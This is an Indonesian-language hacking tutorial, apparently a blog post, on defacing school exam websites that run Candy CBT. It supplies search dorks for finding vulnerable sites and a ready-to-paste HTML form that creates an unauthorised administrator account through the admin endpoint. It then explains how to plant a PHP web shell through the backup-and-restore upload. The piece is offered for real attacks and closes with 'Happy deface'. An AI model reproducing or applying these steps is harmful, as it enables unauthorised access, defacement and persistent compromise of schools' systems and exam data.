Cara Deface CBT add Admin

Hello guys welcome back lagi dengan saya Dwi ganss, kali ini saya akan membawakan tutorial cara Deface CBT add Admin.

Kenapa add admin? Karna kita akan mencoba menyuntikkan account Admin kedalam website CBT menggunakan CSRF. Tentunya kalian penasaran banget kan , gimana caranya :v.

Okey langsung saja

Bahan yang di butuhkan :

-Dork “Support By Candy CBT” “Candy CBT”+”Login” (Kembangin lagi lurrr…)

-CSRF Admin Bisa copas di bawah: =====================================

<html> <head></head> <body> <form action=”linktarget.sch.id/admin/?pg=pengawas” method=”post”> <label>nip</label> <input type=”text” name=”nip” value=”123761717″ required=”true” /> <br> <label>nama</label> <input type=”text” name=”nama” required=”true” /> <br> <label>username</label> <input type=”text” name=”username” required=”true” /> <br> <label>password</label> <input type=”password” name=”pass1″ required=”true” /> <br> <label>ulang password</label> <input type=”password” name=”pass2″ required=”true” /> <br> <button type=”submit” name=”submit”>simpan</button> </form> </body> </html> =====================================

-Secangkir kopi buat refresing -rokok biar tambah lancar :v Okey langsung saja kita ke caranya Pertama kita nge dork dulu pakek dork di atas. Kek gini contohnya :

Setelah itu kalian pilih target. Jika kalian sudah menemukan target. Tambahkan pada link target dengan Exploit /admin. Seperti ini contohnya: http://inihanyacontoh.sch.id/admin Maka akan beralih ke halaman admin login Lalu kalian copy linknya lalu masukan ke codingan csrf admin di bagian action. Seperti ini:

Jika sudah kalian sv codingan nya lalu jalankan csrf nya Kalian masukan nama, username, dan password sesuka kalian lalu klik simpan. Seperti gambar di bawah:

Maka akan otomatis beralih ke halaman admin loginya lagi. Setelah itu kalian masukan dengan akun admin yang kalian buat tadi. Setelah itu tinggal login Kalo vuln maka akan menuju ke dashboard admin cbt nya. Seperti ini :

Itu adalah salah satu contoh website yang vuln. Jika tidak vuln maka akan ada tulisan “pengguna tidak terdaftar”. Lebih tepatnya seperti ini:

Saya kira cukup sampai disini. Oh iya cara nanam shell?? Kalian pergi ke pengaturan>>Lalu klik backup && restore>> setelah itu upload shell.php kalian>> kalo terupload akan ada tulisan “Restore telah berhasil” setelah itu kalian tinggal mengaksesnya saja. Seperti ini link.target.sch.id/admin/namashell.php Nahhhh kali ini sampai disini dulu yahhh Thx teman teman yang udah mau baca Terimakasih juga teman teman yang udah support cukimay cyber team Happy deface 🙂 Sekian dari saya Selamat mencoba ~~~~~